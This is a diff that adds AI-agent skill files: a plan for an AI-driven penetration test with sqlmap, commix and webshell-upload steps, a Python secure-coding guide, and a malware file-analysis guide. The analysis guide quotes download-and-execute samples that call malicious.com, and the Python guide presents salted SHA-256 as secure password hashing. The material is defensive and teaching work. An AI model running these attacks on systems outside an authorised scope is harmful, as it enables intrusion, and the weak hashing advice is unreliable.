+    ┌──────────▼───┐  ┌──────▼───────┐  ┌──▼──────────┐
+    │  STREAM 1    │  │  STREAM 2    │  │  STREAM 3   │
+    │  Recon       │  │  Testing     │  │  Tool       │
+    │  Agent       │  │  Agent       │  │  Runner     │
+    │              │  │              │  │             │
+    │ - Subdomains │  │ - Vuln tests │  │ - nmap      │
+    │ - DNS enum   │  │ - Auth tests │  │ - nuclei    │
+    │ - Tech stack │  │ - Logic bugs │  │ - ffuf      │
+    │ - Endpoints  │  │ - API tests  │  │ - sqlmap    │
+    └──────┬───────┘  └──────┬───────┘  └──────┬──────┘
+           │                 │                  │
+           └─────────────────┼──────────────────┘
+                             │
+                    ┌────────▼────────┐
+                    │  SHARED STATE   │
+                    │  (Findings DB)  │
+                    └─────────────────┘
+```
+
+**Stream 1 - Recon Agent:**
+- Discovers attack surface (subdomains, endpoints, technologies)
+- Feeds discovered endpoints to Stream 2 and Stream 3
+- Runs continuously, expanding scope as new assets are found
+
+**Stream 2 - Testing Agent:**
+- AI-driven vulnerability testing on discovered endpoints
+- Tests business logic, authentication, authorization
+- Uses findings from Stream 3 to identify areas needing manual attention
+
+**Stream 3 - Tool Runner:**
+- Executes security tools (nmap, nuclei, ffuf, sqlmap, etc.)
+- Feeds tool output back to Stream 2 for AI analysis
+- Handles automated scanning at scale
+
+### Communication Protocol
+
+Streams communicate via a shared findings database:
+
+```python
+# Finding structure shared between streams
+class Finding:
+    id: str                    # Unique identifier
+    source_stream: str         # Which stream discovered it
+    finding_type: str          # "endpoint", "vulnerability", "info"
+    target: str                # URL, IP, or resource
+    severity: str              # critical, high, medium, low, info
+    confidence: int            # 0-100 (from validation pipeline)
+    details: dict              # Finding-specific data
+    chain_candidates: list     # IDs of related findings
+    status: str                # "new", "validated", "reported", "false_positive"
+    timestamp: datetime
+
+# Stream messages
+class StreamMessage:
+    type: str                  # "new_target", "finding", "coverage_update"
+    source: str                # Stream ID
+    data: dict                 # Message payload
+```
+
+## Engagement Phases
+
+### Phase 0: Scoping & Setup
+
+Before any testing begins:
+
+```yaml
+scope_definition:
+  in_scope:
+    - domains: ["target.com", "*.target.com"]
+    - ip_ranges: ["10.0.0.0/24"]
+    - applications: ["https://app.target.com"]
+  out_of_scope:
+    - domains: ["mail.target.com"]
+    - ip_ranges: ["10.0.1.0/24"]
+    - notes: "Production database - read-only testing"
+
+  rules_of_engagement:
+    - "No denial of service testing"
+    - "No social engineering"
+    - "Testing window: Mon-Fri 09:00-17:00 UTC"
+    - "Emergency contact: security@target.com"
+    - "Rate limit: max 50 requests/second"
+
+  objectives:
+    primary: "Identify vulnerabilities in web application"
+    secondary: "Assess API security posture"
+    deliverable: "Professional pentest report with remediation"
+```
+
+### Phase 1: Reconnaissance
+
+```yaml
+passive_recon:
+  tasks:
+    - subdomain_enumeration:
+        tools: ["subfinder", "amass", "assetfinder"]
+        output: "List of live subdomains"
+    - technology_detection:
+        tools: ["whatweb", "wappalyzer"]
+        output: "Tech stack per subdomain"
+    - endpoint_discovery:
+        tools: ["katana", "gau", "waybackurls"]
+        output: "List of known endpoints"
+    - dns_analysis:
+        tools: ["dnsx", "dig"]
+        output: "DNS records, potential takeovers"
+
+active_recon:
+  tasks:
+    - port_scanning:
+        tools: ["nmap", "rustscan", "naabu"]
+        output: "Open ports and services per host"
+    - directory_bruteforce:
+        tools: ["ffuf", "feroxbuster", "gobuster"]
+        output: "Hidden endpoints and directories"
+    - api_discovery:
+        tools: ["ffuf with API wordlists"]
+        output: "API endpoints, versions, documentation"
+
+  output_to_next_phase:
+    - live_hosts: "List of responsive hosts with ports"
+    - endpoints: "Complete endpoint map"
+    - tech_stack: "Technologies per host (for targeted testing)"
+    - attack_surface: "Summary of entry points"
+```
+
+### Phase 2: Vulnerability Assessment
+
+```yaml
+automated_scanning:
+  tasks:
+    - vulnerability_scan:
+        tools: ["nuclei"]
+        templates: ["cves", "exposures", "misconfigurations"]
+        output: "Known CVEs and misconfigurations"
+    - web_vulnerability_scan:
+        tools: ["nikto", "wpscan (if WordPress)"]
+        output: "Web server and CMS vulnerabilities"
+
+ai_driven_testing:
+  tasks:
+    - waf_detection:
+        skill: "waf-detection-bypass"
+        output: "WAF vendor, bypass techniques"
+    - authentication_testing:
+        checks:
+          - "Default credentials"
+          - "Brute force protection"
+          - "Password policy enforcement"
+          - "Session management"
+          - "Multi-factor authentication bypass"
+    - authorization_testing:
+        checks:
+          - "IDOR on all resource endpoints"
+          - "Horizontal privilege escalation"
+          - "Vertical privilege escalation"
+          - "Missing function-level access control"
+    - injection_testing:
+        checks:
+          - "SQL injection (all input points)"
+          - "XSS (reflected, stored, DOM)"
+          - "Command injection"
+          - "SSTI/CSTI"
+          - "LDAP injection"
+    - business_logic:
+        checks:
+          - "Race conditions"
+          - "Price manipulation"
+          - "Workflow bypass"
+          - "Rate limit bypass"
+
+  validation:
+    skill: "ai-pentesting-validation"
+    requirements:
+      - "Every finding passes negative control"
+      - "Every finding has proof-of-execution"
+      - "Minimum confidence: 60"
+```
+
+### Phase 3: Exploitation & Chain Analysis
+
+```yaml
+exploitation:
+  tasks:
+    - validate_findings:
+        skill: "ai-pentesting-validation"
+        output: "Validated vulnerability list with confidence scores"
+    - chain_analysis:
+        skill: "exploit-chain-patterns"
+        output: "Identified attack chains with impact scores"
+    - proof_of_concept:
+        requirements:
+          - "Safe, reproducible PoC for each finding"
+          - "No destructive payloads"
+          - "Screenshots and HTTP logs for evidence"
+
+  adaptive_strategy:
+    description: "Adjust testing based on findings so far"
+    rules:
+      - trigger: "SSRF found"
+        action: "Test internal network reachability, cloud metadata"
+      - trigger: "SQLi found"
+        action: "Attempt DB-specific escalation (see exploit-chain-patterns)"
+      - trigger: "Auth bypass found"
+        action: "Test all admin functionality"
+      - trigger: "File upload found"
+        action: "Test webshell upload and execution"
+      - trigger: "No vulns on primary target"
+        action: "Expand to API endpoints, mobile API, staging environments"
+```
+
+### Phase 4: Reporting
+
+```yaml
+report_generation:
+  sections:
+    executive_summary:
+      - "Overall risk rating"
+      - "Key findings (top 5)"
+      - "Business impact summary"
+      - "Remediation priority"
+
+    technical_findings:
+      per_finding:
+        - "Title and severity"
+        - "CVSS score"
+        - "MITRE ATT&CK mapping"
+        - "Description and impact"
+        - "Proof of concept (HTTP request/response)"
+        - "Remediation recommendation"
+        - "Validation status (confidence score)"
+        - "Chain membership (if part of attack chain)"
+
+    attack_chains:
+      per_chain:
+        - "Chain name and impact"
+        - "Step-by-step attack path"
+        - "Chain breaker recommendations"
+
+    methodology:
+      - "Tools used"
+      - "Testing timeline"
+      - "Scope coverage map"
+      - "Limitations and caveats"
+```
+
+## Adaptive Strategy Engine
+
+### Dead Endpoint Detection
+
+Stop wasting time on endpoints that don't yield results:
+
+```python
+class DeadEndpointDetector:
+    """
+    Track endpoint testing history.
+    Mark endpoints as 'dead' if N consecutive tests yield nothing.
+    """
+
+    CONSECUTIVE_FAIL_THRESHOLD = 10
+
+    def should_continue_testing(self, endpoint):
+        history = self.get_history(endpoint)
+
+        # Count consecutive tests with no findings
+        consecutive_failures = 0
+        for test in reversed(history):
+            if test.found_something:
+                break
+            consecutive_failures += 1
+
+        if consecutive_failures >= self.CONSECUTIVE_FAIL_THRESHOLD:
+            return False  # Move on to other endpoints
+
+        return True
+```
+
+### Diminishing Returns Detection
+
+```python
+class DiminishingReturnsDetector:
+    """
+    Track finding rate over time.
+    If rate drops below threshold, suggest scope expansion or wrap-up.
+    """
+
+    def check_rate(self, findings_timeline):
+        # Findings per hour in last 2 hours
+        recent_rate = self.calc_rate(findings_timeline, hours=2)
+        # Findings per hour overall
+        overall_rate = self.calc_rate(findings_timeline, hours=None)
+
+        if recent_rate < overall_rate * 0.1:  # <10% of average
+            return {
+                "status": "diminishing_returns",
+                "suggestion": "Consider expanding scope or moving to reporting",
+                "recent_rate": recent_rate,
+                "overall_rate": overall_rate,
+            }
+
+        return {"status": "productive", "rate": recent_rate}
+```
+
+### Priority Recomputation
+
+Dynamically reorder testing priorities based on discoveries:
+
+```yaml
+priority_rules:
+  - condition: "New subdomain discovered"
+    action: "Add to recon queue (high priority)"
+
+  - condition: "Admin panel found"
+    action: "Move to top of testing queue"
+
+  - condition: "API endpoint with no authentication"
+    action: "Immediate deep testing"
+
+  - condition: "Cloud metadata accessible via SSRF"
+    action: "CRITICAL - pause other testing, exploit this chain"
+
+  - condition: "WAF blocking all payloads"
+    action: "Deprioritize blocked endpoints, try bypass techniques"
+
+  - condition: "Rate limited by target"
+    action: "Reduce request rate, rotate to different endpoints"
+```
+
+## Coverage Tracking
+
+Ensure comprehensive testing across all attack surface areas:
+
+```yaml
+coverage_matrix:
+  authentication:
+    - login_bruteforce: "tested | not_tested | not_applicable"
+    - session_management: "tested | not_tested"
+    - password_reset: "tested | not_tested"
+    - mfa_bypass: "tested | not_tested"
+    - oauth_flows: "tested | not_tested"
+
+  authorization:
+    - idor_all_endpoints: "tested | not_tested"
+    - privilege_escalation: "tested | not_tested"
+    - function_level_access: "tested | not_tested"
+
+  injection:
+    - sqli_all_params: "tested | not_tested"
+    - xss_all_inputs: "tested | not_tested"
+    - command_injection: "tested | not_tested"
+    - ssti: "tested | not_tested"
+
+  business_logic:
+    - race_conditions: "tested | not_tested"
+    - workflow_bypass: "tested | not_tested"
+    - price_manipulation: "tested | not_tested"
+
+  infrastructure:
+    - port_scan: "tested | not_tested"
+    - ssl_tls_config: "tested | not_tested"
+    - header_security: "tested | not_tested"
+    - cors_config: "tested | not_tested"
+```
+
+## Tool Integration Reference
+
+### Recon Phase Tools
+
+| Tool | Purpose | Command Pattern |
+|------|---------|-----------------|
+| **subfinder** | Subdomain enum | `subfinder -d target.com -o subs.txt` |
+| **httpx** | HTTP probing | `httpx -l subs.txt -sc -cl -ct -title -o alive.txt` |
+| **katana** | Web crawling | `katana -u https://target.com -d 3 -o endpoints.txt` |
+| **naabu** | Port scanning | `naabu -host target.com -top-ports 1000 -o ports.txt` |
+| **whatweb** | Tech detection | `whatweb https://target.com` |
+
+### Scanning Phase Tools
+
+| Tool | Purpose | Command Pattern |
+|------|---------|-----------------|
+| **nuclei** | Vuln scanning | `nuclei -l alive.txt -t cves,exposures -o vulns.txt` |
+| **ffuf** | Dir bruteforce | `ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403` |
+| **sqlmap** | SQLi testing | `sqlmap -u "https://target.com/page?id=1" --batch --level 3` |
+| **nikto** | Web server scan | `nikto -h https://target.com` |
+| **wafw00f** | WAF detection | `wafw00f https://target.com` |
+
+### Exploitation Phase Tools
+
+| Tool | Purpose | Command Pattern |
+|------|---------|-----------------|
+| **sqlmap** | SQLi exploit | `sqlmap -u URL --dbs --batch` |
+| **commix** | Command inj. | `commix --url="https://target.com/page?cmd=test"` |
+| **tplmap** | SSTI exploit | `tplmap -u "https://target.com/page?name=test"` |
+
+## Quality Checklist
+
+- [ ] Scope clearly defined with in-scope and out-of-scope assets
+- [ ] Rules of engagement documented and followed
+- [ ] All three streams running with shared finding state
+- [ ] Recon findings feeding into testing and tool streams
+- [ ] Validation pipeline active for all findings (ai-pentesting-validation)
+- [ ] Chain analysis performed on validated findings
+- [ ] Dead endpoints detected and deprioritized
+- [ ] Coverage matrix shows all areas tested
+- [ ] Rate limits respected throughout engagement
+- [ ] Report generated with executive and technical sections
+- [ ] All findings have proof-of-concept evidence
+- [ ] Remediation recommendations are actionable
+
+## Integration Points
+
+- **ai-pentesting-validation** - Core validation pipeline for all findings
+- **exploit-chain-patterns** - Chain analysis during Phase 3
+- **waf-detection-bypass** - WAF handling during Phase 2
+- **detection-engineer** - Generate detection rules from findings
+- **malware-report-writer** - Report format and structure guidelines
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads in a supported agent (Claude Code, OpenCode, Cursor) without frontmatter parsing errors.
+2. **Structure test**: Verify all engagement phases (0-4) render correctly with proper YAML code blocks.
+3. **Integration test**: Confirm referenced skills (ai-pentesting-validation, exploit-chain-patterns, waf-detection-bypass) exist and are loadable.
+4. **Coverage test**: Validate the coverage matrix YAML parses correctly and all categories are present.
+5. **Tool reference test**: Verify all tool command patterns in the reference tables are syntactically correct.

--- a/internal/assets/skills/python-security/SKILL.md
+++ b/internal/assets/skills/python-security/SKILL.md
@@ -1,0 +1,328 @@
+---
+name: python-security
+description: "Secure Python patterns for defensive coding. Trigger: writing security tools, implementing input validation, handling crypto, or building secure network apps."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Python Security
+
+Secure Python patterns, input validation, cryptographic best practices, and defensive coding for security tools and applications.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Write secure Python code for security tools and automation
+- Implement input validation and sanitization
+- Handle cryptographic operations safely
+- Build secure network applications and APIs
+- Prevent common Python security vulnerabilities (injection, path traversal, etc.)
+- Use security-focused Python libraries correctly
+
+## Core Security Libraries
+
+### Cryptography
+
+```python
+from cryptography.fernet import Fernet
+from cryptography.hazmat.primitives import hashes
+from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
+import secrets
+
+# Generate secure random token
+def generate_token(length=32):
+    """Generate cryptographically secure token"""
+    return secrets.token_urlsafe(length)
+
+# Generate secure random password
+def generate_password(length=16):
+    """Generate secure random password"""
+    import string
+    alphabet = string.ascii_letters + string.digits + string.punctuation
+    return ''.join(secrets.choice(alphabet) for _ in range(length))
+
+# Symmetric encryption with Fernet
+def encrypt_data(data, key):
+    """Encrypt data using Fernet symmetric encryption"""
+    f = Fernet(key)
+    return f.encrypt(data.encode())
+
+def decrypt_data(encrypted_data, key):
+    """Decrypt data"""
+    f = Fernet(key)
+    return f.decrypt(encrypted_data).decode()
+
+# Generate encryption key
+key = Fernet.generate_key()
+```
+
+### Secure Hashing
+
+```python
+import hashlib
+import hmac
+
+# Secure password hashing
+def hash_password(password: str) -> str:
+    """Hash password with salt using SHA-256"""
+    salt = secrets.token_hex(16)
+    hashed = hashlib.sha256((salt + password).encode()).hexdigest()
+    return f"{salt}${hashed}"
+
+def verify_password(stored: str, provided: str) -> bool:
+    """Verify password against stored hash"""
+    salt, hashed = stored.split('$')
+    return hmac.compare_digest(
+        hashlib.sha256((salt + provided).encode()).hexdigest(),
+        hashed
+    )
+
+# HMAC for message authentication
+def create_hmac(message: str, key: bytes) -> str:
+    """Create HMAC signature"""
+    return hmac.new(key, message.encode(), hashlib.sha256).hexdigest()
+```
+
+## Input Validation & Sanitization
+
+### IP Address Validation
+
+```python
+import re
+import ipaddress
+
+def validate_ip(ip: str) -> bool:
+    """Validate IP address using ipaddress module"""
+    try:
+        ipaddress.ip_address(ip)
+        return True
+    except ValueError:
+        return False
+
+def is_private_ip(ip: str) -> bool:
+    """Check if IP is private/internal"""
+    try:
+        return ipaddress.ip_address(ip).is_private
+    except ValueError:
+        return False
+```
+
+### Input Sanitization
+
+```python
+import html
+import re
+
+def sanitize_html_input(user_input: str) -> str:
+    """Escape HTML to prevent XSS"""
+    return html.escape(user_input)
+
+def sanitize_filename(filename: str) -> str:
+    """Sanitize filename to prevent path traversal"""
+    # Remove path separators and dangerous characters
+    sanitized = re.sub(r'[\\/:\*\?"<>\|]', '', filename)
+    # Remove leading/trailing whitespace and dots
+    sanitized = sanitized.strip('. ')
+    return sanitized or 'unnamed'
+
+def validate_url(url: str, allowed_domains: list) -> bool:
+    """Validate URL against allowlist to prevent SSRF"""
+    from urllib.parse import urlparse
+    parsed = urlparse(url)
+    return parsed.hostname in allowed_domains
+```
+
+### SQL Injection Prevention
+
+```python
+import sqlite3
+
+# SECURE: Parameterized queries
+def get_user(db: sqlite3.Connection, user_id: int):
+    """Secure parameterized query"""
+    cursor = db.execute("SELECT * FROM users WHERE id = ?", (user_id,))
+    return cursor.fetchone()
+
+# NEVER DO THIS:
+# cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")
+```
+
+## Network Security
+
+### Secure HTTP Requests
+
+```python
+import requests
+from requests.adapters import HTTPAdapter
+from urllib3.util.ssl_ import create_urllib3_context
+
+def create_secure_session() -> requests.Session:
+    """Create a session with TLS verification"""
+    session = requests.Session()
+    adapter = HTTPAdapter()
+    session.mount('https://', adapter)
+    return session
+
+def secure_get(url: str, timeout: int = 10) -> requests.Response:
+    """Make secure HTTP GET request"""
+    response = requests.get(url, timeout=timeout, verify=True)
+    response.raise_for_status()
+    return response
+```
+
+### Secure Socket Programming
+
+```python
+import socket
+import ssl
+
+def create_tls_socket(host: str, port: int) -> ssl.SSLSocket:
+    """Create a TLS-secured socket"""
+    context = ssl.create_default_context()
+    context.check_hostname = True
+    context.verify_mode = ssl.CERT_REQUIRED
+
+    sock = socket.create_connection((host, port))
+    secure_sock = context.wrap_socket(sock, server_hostname=host)
+    return secure_sock
+```
+
+## Common Security Testing Patterns
+
+### Port Scanning (Ethical Use Only)
+
+```python
+import socket
+
+def scan_port(host: str, port: int, timeout: float = 1.0) -> bool:
+    """Scan single port"""
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.settimeout(timeout)
+        result = sock.connect_ex((host, port))
+        sock.close()
+        return result == 0
+    except socket.error:
+        return False
+
+def scan_ports(host: str, ports: list) -> list:
+    """Scan multiple ports"""
+    return [port for port in ports if scan_port(host, port)]
+```
+
+### Banner Grabbing
+
+```python
+import socket
+
+def grab_banner(host: str, port: int, timeout: float = 2.0) -> str | None:
+    """Grab service banner"""
+    try:
+        sock = socket.socket()
+        sock.settimeout(timeout)
+        sock.connect((host, port))
+        banner = sock.recv(1024).decode().strip()
+        sock.close()
+        return banner
+    except (socket.error, UnicodeDecodeError):
+        return None
+```
+
+## Security Best Practices
+
+### Never Hardcode Secrets
+
+```python
+# BAD: Hardcoded credentials
+API_KEY = "sk-1234567890abcdef"
+DB_PASSWORD = "supersecret"
+
+# GOOD: Use environment variables
+import os
+API_KEY = os.environ.get("API_KEY")
+DB_PASSWORD = os.environ.get("DB_PASSWORD")
+```
+
+### Use Secure Temp Files
+
+```python
+import tempfile
+
+# GOOD: Secure temporary file
+with tempfile.NamedTemporaryFile(delete=True, mode='w') as f:
+    f.write("sensitive data")
+    f.flush()
+    # File is automatically deleted on close
+```
+
+### Avoid eval/exec
+
+```python
+# NEVER DO THIS:
+# result = eval(user_input)
+# exec(user_input)
+
+# GOOD: Use safe alternatives
+import ast
+import json
+
+# Parse JSON safely
+data = json.loads(user_input)
+
+# Parse Python literals safely
+result = ast.literal_eval(user_input)
+```
+
+### Secure File Operations
+
+```python
+import os
+
+def safe_file_read(filepath: str, allowed_dir: str) -> str:
+    """Read file safely, preventing path traversal"""
+    real_path = os.path.realpath(filepath)
+    real_allowed = os.path.realpath(allowed_dir)
+
+    if not real_path.startswith(real_allowed):
+        raise ValueError(f"Access denied: {filepath} is outside allowed directory")
+
+    with open(real_path, 'r') as f:
+        return f.read()
+```
+
+## Ethical Security Guidelines
+
+1. **Authorization**: ALWAYS get written permission before testing
+2. **Scope**: Stay within defined boundaries
+3. **Documentation**: Log all activities
+4. **Responsible Disclosure**: Report vulnerabilities properly
+5. **No Harm**: Never cause damage or disruption
+
+## Installation
+
+```bash
+# Core security libraries
+pip install cryptography requests
+
+# Optional: for advanced security testing
+pip install scapy impacket paramiko
+```
+
+## References
+
+- [OWASP Python Security Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Python_Security_Cheatsheet.html)
+- [Python Security Best Practices](https://python.readthedocs.io/en/stable/library/security_warnings.html)
+- [Cryptography Documentation](https://cryptography.io/en/latest/)
+- [Secrets Module](https://docs.python.org/3/library/secrets.html)
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Code test**: Execute all Python code examples to verify they run without errors (cryptography, hashlib, ipaddress, html, requests, ssl, socket, tempfile, ast, json modules).
+3. **Security test**: Verify the "NEVER DO THIS" examples are clearly marked as insecure and the "GOOD" alternatives are correct.
+4. **Import test**: Confirm all import statements reference standard or correctly-named third-party libraries.
+5. **Best practices test**: Validate that all code examples follow current Python security recommendations (no eval/exec, parameterized queries, TLS verification).

--- a/internal/assets/skills/specialized-file-analyzer/SKILL.md
+++ b/internal/assets/skills/specialized-file-analyzer/SKILL.md
@@ -1,0 +1,515 @@
+---
+name: specialized-file-analyzer
+description: "Analyze non-PE file types in malware campaigns. Trigger: analyzing .NET assemblies, Office macros, PDFs, scripts, archives, or Linux ELF binaries."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
+---
+
+# Specialized File Analyzer
+
+Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, archives, and Linux binaries.
+
+## When to Use This Skill
+
+Use this skill when analyzing:
+- **.NET/C# assemblies** (.exe, .dll with .NET framework)
+- **Office documents** with macros (.docm, .xlsm, .doc, .xls)
+- **PDF files** (suspicious attachments, exploit documents)
+- **Scripts** (PowerShell .ps1, VBScript .vbs, JavaScript .js)
+- **Archives** (.zip, .rar, .7z, .tar.gz)
+- **Shortcuts** (.lnk files)
+- **Linux binaries** (ELF executables)
+- **Batch files** (.bat, .cmd)
+
+**Key indicator:** `file` command shows non-PE32 executable or document type.
+
+## Quick File Type Identification
+
+```bash
+# Identify file type
+file sample.bin
+
+# Common outputs:
+# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
+# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
+# "Microsoft Office Document" → Office macro (use this skill)
+# "PDF document, version 1.7" → PDF (use this skill)
+# "Zip archive data" → Archive (use this skill)
+# "ELF 64-bit LSB executable" → Linux binary (use this skill)
+# "ASCII text, with CRLF line terminators" → Script (use this skill)
+```
+
+---
+
+## .NET / C# Assembly Analysis
+
+### Detection
+```bash
+# Check for .NET assembly
+file sample.exe | grep "Mono/.Net assembly"
+
+# Or check strings
+strings sample.exe | grep "mscoree.dll"
+```
+
+### Tool: dnSpy (Windows - Primary Tool)
+
+**Download:** https://github.com/dnSpy/dnSpy
+
+**Workflow:**
+1. Open sample.exe in dnSpy
+2. Navigate: Assembly Explorer → sample.exe → Namespace → Classes
+3. Find entry point: Right-click assembly → Go to Entry Point
+
+**What to Look For:**
+
+**Main() Function:**
+```csharp
+// Entry point - start here
+public static void Main(string[] args)
+{
+    // Analyze execution flow
+}
+```
+
+**Suspicious Namespaces:**
+- `System.Net` - Network operations (WebClient, HttpClient)
+- `System.Security.Cryptography` - Encryption/decryption
+- `System.Reflection` - Dynamic code loading
+- `System.Diagnostics.Process` - Process execution
+- `System.IO` - File operations
+- `Microsoft.Win32` - Registry access
+
+**Common Malicious Patterns:**
+```csharp
+// Download and execute
+WebClient wc = new WebClient();
+wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
+Process.Start("C:\\temp\\payload.exe");
+
+// Base64 decode embedded payload
+byte[] decoded = Convert.FromBase64String(encodedPayload);
+
+// Reflective loading
+Assembly.Load(byte[] rawAssembly);
+```
+
+**Extract Embedded Resources:**
+```
+Assembly Explorer → Right-click assembly → Resources
+Look for:
+- Embedded executables (byte arrays)
+- Encrypted payloads
+- Configuration data
+- Icons (may hide data)
+
+Right-click resource → Save
+```
+
+**Deobfuscation:**
+```bash
+# Using de4dot (automated deobfuscator)
+de4dot sample.exe -o sample_deobfuscated.exe
+```
+
+### Tool: ILSpy (Cross-platform Alternative)
+
+```bash
+# Command-line decompilation
+ilspycmd sample.exe -o output_directory/
+```
+
+### Analysis Checklist - .NET
+
+- [ ] Entry point identified (Main function)
+- [ ] Obfuscation detected and removed (if needed)
+- [ ] Embedded resources extracted
+- [ ] Network URLs/IPs extracted
+- [ ] Crypto keys identified
+- [ ] Anti-analysis checks found
+- [ ] Payload execution method documented
+- [ ] IOCs extracted (URLs, IPs, file paths)
+
+---
+
+## Office Document / Macro Analysis
+
+### Detection
+```bash
+# Macro-enabled formats
+# .docm, .xlsm, .pptm → Office 2007+ with macros
+# .doc, .xls, .ppt → Legacy Office (97-2003) with macros
+
+file document.docm
+
+# Quick macro check
+strings document.docm | grep -i "vba\|macro\|autoopen"
+```
+
+### Tool: oledump.py (Primary - Didier Stevens)
+
+**Workflow:**
+
+**1. List Streams:**
+```bash
+python oledump.py document.docm
+
+# Example output:
+#  1:       114 '\x01CompObj'
+#  2:      4096 '\x05DocumentSummaryInformation'
+#  3: M    8192 'Macros/VBA/ThisDocument'  ← Macro present (M indicator)
+#  4: m    1024 'Macros/VBA/_VBA_PROJECT'
+#  5: M    4096 'Macros/VBA/Module1'
+```
+
+**2. Extract Macro Code:**
+```bash
+# Extract macro from stream 3
+python oledump.py -s 3 -v document.docm
+
+# Save to file
+python oledump.py -s 3 -v document.docm > extracted_macro.vba
+```
+
+**3. Analyze Macro Code:**
+
+Look for **Auto-Execution Functions:**
+```vba
+Sub AutoOpen()          ' Word - runs on document open
+Sub Document_Open()     ' Word - runs on document open
+Sub Workbook_Open()     ' Excel - runs on workbook open
+Sub Auto_Open()         ' Excel - runs on workbook open
+```
+
+Look for **Suspicious VBA Functions:**
+```vba
+' Command execution
+Shell("cmd.exe /c powershell ...")
+CreateObject("WScript.Shell").Run "..."
+
+' File download
+CreateObject("MSXML2.XMLHTTP")
+URLDownloadToFile ...
+
+' File system operations
+CreateObject("Scripting.FileSystemObject")
+```
+
+### Tool: olevba (oletools Suite)
+
+**Installation:**
+```bash
+pip install oletools
+```
+
+**Automated Analysis:**
+```bash
+# Comprehensive analysis
+olevba document.docm
+
+# Decode obfuscated strings
+olevba --decode document.docm
+```
+
+**Output Interpretation:**
+- **AutoExec** - Auto-execution keywords found
+- **Suspicious** - Suspicious VBA keywords
+- **IOCs** - URLs, IPs, file paths
+- **Hex Strings** - Encoded data
+- **Base64 Strings** - Encoded payloads
+
+### Analysis Checklist - Office Documents
+
+- [ ] Macro presence confirmed
+- [ ] All macro streams extracted
+- [ ] Auto-execution functions identified
+- [ ] Obfuscated strings decoded
+- [ ] Download URLs extracted
+- [ ] Payload execution method documented
+- [ ] External template checked (.docx/.xlsx)
+- [ ] Embedded objects analyzed
+- [ ] IOCs extracted and defanged
+
+---
+
+## PDF Analysis
+
+### Detection
+```bash
+file document.pdf
+```
+
+### Tool: pdfid.py (Didier Stevens)
+
+**Quick Triage:**
+```bash
+python pdfid.py document.pdf
+
+# Red flags:
+# /OpenAction   - Executes action on open
+# /AA           - Additional actions (auto-execute)
+# /JavaScript   - Embedded JavaScript
+# /JS           - JavaScript (short form)
+# /Launch       - Launch external program
+# /EmbeddedFile - Embedded files
+# /RichMedia    - Flash/multimedia content
+```
+
+### Tool: pdf-parser.py (Didier Stevens)
+
+**Extract JavaScript:**
+```bash
+# Search for JavaScript objects
+python pdf-parser.py --search javascript document.pdf
+
+# Extract specific object
+python pdf-parser.py --object 15 document.pdf
+
+# Dump JavaScript code
+python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt
+```
+
+### Analysis Checklist - PDF
+
+- [ ] pdfid scan completed (flags identified)
+- [ ] JavaScript extracted (if present)
+- [ ] Embedded files extracted
+- [ ] Auto-action mechanism documented
+- [ ] Shellcode indicators checked
+- [ ] URLs/IPs extracted from JS
+- [ ] IOCs documented
+
+---
+
+## PowerShell / Script Analysis
+
+### PowerShell (.ps1) Deobfuscation
+
+**Common Obfuscation Patterns:**
+
+**Base64 Encoding:**
+```powershell
+# Encoded command execution
+powershell.exe -EncodedCommand <base64_string>
+```
+
+**Suspicious PowerShell Patterns:**
+- `Invoke-Expression` / `IEX` - Execute string as code
+- `Invoke-WebRequest` / `Invoke-RestMethod` - Download content
+- `DownloadString` / `DownloadFile` - Download payloads
+- `FromBase64String` - Decode embedded payload
+- `IO.Compression.GzipStream` - Decompress payload
+- `Reflection.Assembly]::Load` - Load assembly from memory
+- `-EncodedCommand` - Base64 encoded command
+- `-WindowStyle Hidden` - Hide window
+- `-ExecutionPolicy Bypass` - Bypass script execution policy
+
+### VBScript (.vbs) Analysis
+
+```vbs
+' Common malicious patterns:
+
+' Command execution
+CreateObject("WScript.Shell").Run "cmd.exe /c ..."
+
+' HTTP download
+Set objHTTP = CreateObject("MSXML2.XMLHTTP")
+objHTTP.Open "GET", "http://malicious.com/payload.exe", False
+objHTTP.Send
+```
+
+### JavaScript (.js) Analysis
+
+```bash
+# Beautify obfuscated JS
+cat malicious.js | js-beautify > beautified.js
+```
+
+**Suspicious Patterns:**
+```javascript
+// Code execution
+eval(encodedCode);
+
+// ActiveX (Windows COM objects)
+var shell = new ActiveXObject("WScript.Shell");
+shell.Run("cmd.exe /c ...");
+```
+
+### Analysis Checklist - Scripts
+
+- [ ] Script type identified (PS1, VBS, JS, BAT)
+- [ ] Obfuscation detected and removed
+- [ ] Base64/encoded strings decoded
+- [ ] Download URLs extracted
+- [ ] Execution commands documented
+- [ ] Dropped file paths identified
+- [ ] IOCs extracted (URLs, IPs, domains)
+
+---
+
+## Archive Analysis
+
+### Safe Inspection (No Extraction)
+
+```bash
+# List contents without extracting
+7z l archive.zip
+unzip -l archive.zip
+tar -tzf archive.tar.gz
+
+# Look for red flags:
+# - Double extensions (invoice.pdf.exe)
+# - Executable files (.exe, .scr, .com, .bat, .vbs)
+# - LNK files (shortcuts)
+# - Deeply nested archives
+```
+
+### LNK (Shortcut) File Analysis
+
+**Manual Strings Analysis:**
+```bash
+strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"
+```
+
+### Analysis Checklist - Archives
+
+- [ ] Contents listed without extraction
+- [ ] File extensions verified (no double extensions)
+- [ ] Files extracted to isolated directory
+- [ ] All extracted files typed (file command)
+- [ ] LNK files analyzed (if present)
+- [ ] Nested archives checked
+- [ ] Password documented (if applicable)
+
+---
+
+## Linux / ELF Binary Analysis
+
